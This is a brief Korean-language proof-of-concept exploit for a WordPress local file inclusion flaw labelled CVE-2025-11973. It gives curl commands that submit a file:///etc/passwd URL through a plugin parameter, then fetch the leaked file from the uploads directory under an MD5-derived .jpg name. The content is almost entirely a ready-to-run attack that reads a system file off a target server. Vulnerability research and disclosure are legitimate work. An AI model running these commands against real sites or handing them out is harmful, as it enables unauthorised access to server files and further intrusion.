
CVE-2025-11973에 대한 개념 증명 익스플로잇으로, WordPress에서 file:// 프로토콜을 통한 로컬 파일 포함(LFI)을 보여주며, /etc/passwd를 업로드 디렉토리로 자동 유출합니다.
/etc/passwd를 file://로 읽고 업로드로 유출curl -sS -A "$UA" -X POST "$BASE/?__kds_flag=post" \
--data-urlencode "kds_password=$SECRET" \
--data-urlencode "post_title=sub1-lfi" \
--data-urlencode "__kds_feature_url=file:///etc/passwd"
HASH=$(printf 'file:///etc/passwd' | md5sum | awk '{print $1}')
curl -sS -A "$UA" "$BASE/wp-content/uploads/$YMD/${HASH}.jpg" | head -n 25